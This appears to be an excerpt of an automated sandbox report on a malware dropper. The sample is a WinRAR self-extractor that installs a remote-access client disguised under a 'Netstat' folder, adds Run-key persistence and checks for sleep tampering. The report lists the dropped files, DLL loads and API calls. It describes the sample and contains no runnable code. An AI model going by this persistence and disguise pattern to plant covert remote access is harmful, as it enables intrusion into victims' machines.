Source: C:\Users\Public\Netstat\bild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

File written: C:\Users\Public\Netstat\client32.ini

Jump to behavior

Source: C:\Users\Public\Netstat\bild.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Static file information: File size 2138135 > 1048576

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

File opened: C:\Users\Public\Netstat\msvcr100.dll

Jump to behavior

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe
Source:	Binary string: msvcr100.i386.pdb source: bild.exe, bild.exe, 00000006.00000002.3900156283.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000007.00000002.2164341754.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 00000009.00000002.2252286300.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, bild.exe, 0000000A.00000002.2326094910.000000006C7C1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: bild.exe, 00000006.00000002.3900362528.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000007.00000002.2164541647.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 00000009.00000002.2252520628.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, bild.exe, 0000000A.00000002.2326293538.000000006E352000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: bild.exe, 00000006.00000002.3898223938.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000006.00000000.2053735718.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000007.00000002.2163282550.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000007.00000000.2160770098.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000002.2246542222.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 00000009.00000000.2241928402.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000002.2325321884.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe, 0000000A.00000000.2323620387.0000000000A52000.00000002.00000001.01000000.00000009.sdmp, bild.exe.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: bild.exe, 00000006.00000002.3900285407.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000007.00000002.2164476357.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 00000009.00000002.2252435927.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, bild.exe, 0000000A.00000002.2326221599.000000006CEE5000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,InternetCloseHandle,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,HttpOpenRequestA,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,

6_2_11029590

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

File created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_6143078

Jump to behavior

Source: PCICL32.DLL.0.dr

Static PE information: section name: .hhshare

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DD8B6 push ecx; ret	0_2_003DD8C9
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DCDF0 push eax; ret	0_2_003DCE0E
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1116F055 push ecx; ret	6_2_1116F068
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11169F49 push ecx; ret	6_2_11169F5C
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C606BBF push ecx; ret	6_2_6C606BD2
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5F94C5 push ecx; ret	6_2_6C5F94D8
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1116F055 push ecx; ret	7_2_1116F068
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11169F49 push ecx; ret	7_2_11169F5C

Source: msvcr100.dll.0.dr

Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe	Jump to behavior

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	File created: C:\Users\Public\Netstat\TCCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	File created: C:\Users\Public\Netstat\msvcr100.dll	Jump to dropped file
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	File created: C:\Users\Public\Netstat\pcicapi.dll	Jump to dropped file
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	File created: C:\Users\Public\Netstat\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	File created: C:\Users\Public\Netstat\bild.exe	Jump to dropped file
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	File created: C:\Users\Public\Netstat\HTCTL32.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	File created: C:\Users\Public\Netstat\PCICHEK.DLL	Jump to dropped file
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	File created: C:\Users\Public\Netstat\PCICL32.DLL	Jump to dropped file

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5E7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,	6_2_6C5E7030
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5D5490 GetPrivateProfileIntA,	6_2_6C5D5490
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5D50E0 CreateFileA,wsprintfA,GetPrivateProfileIntA,GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,	6_2_6C5D50E0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5D5117 GetPrivateProfileIntA,wsprintfA,CreateFileA,GetFileSize,GetPrivateProfileIntA,SetFilePointer,FlushFileBuffers,CloseHandle,wsprintfA,CreateFileA,__itow,WritePrivateProfileStringA,	6_2_6C5D5117

Source: C:\Users\Public\Netstat\bild.exe

6_2_11127E10

Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Netstat	Jump to behavior

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	6_2_11139090
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	6_2_1115B1D0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	6_2_11113290
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CB2B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110CB2B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	6_2_110254A0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_110258F0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	6_2_11023BA0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_11024280
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11112670 IsIconic,GetTickCount,	6_2_11112670
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_111229D0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_111229D0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	6_2_110C0BB0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_1115ADD0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_1115ADD0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	7_2_1115B1D0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,	7_2_11139090
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	7_2_11113290
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	7_2_110CB2B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	7_2_110CB2B0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	7_2_110254A0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId,	7_2_110258F0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	7_2_11023BA0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	7_2_11024280
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11112670 IsIconic,GetTickCount,	7_2_11112670
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	7_2_111229D0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	7_2_111229D0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	7_2_110C0BB0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	7_2_1115ADD0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	7_2_1115ADD0

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

6_2_11143570

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Contains functionality to detect sleep reduction / modifications

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5D91F0		6_2_6C5D91F0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5E4F30		6_2_6C5E4F30

Delayed program exit found

Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110B8200 Sleep,ExitProcess,		6_2_110B8200
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110B8200 Sleep,ExitProcess,		7_2_110B8200

Source: C:\Users\Public\Netstat\bild.exe

Window / User API: threadDelayed 937

Jump to behavior

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLL	Jump to dropped file
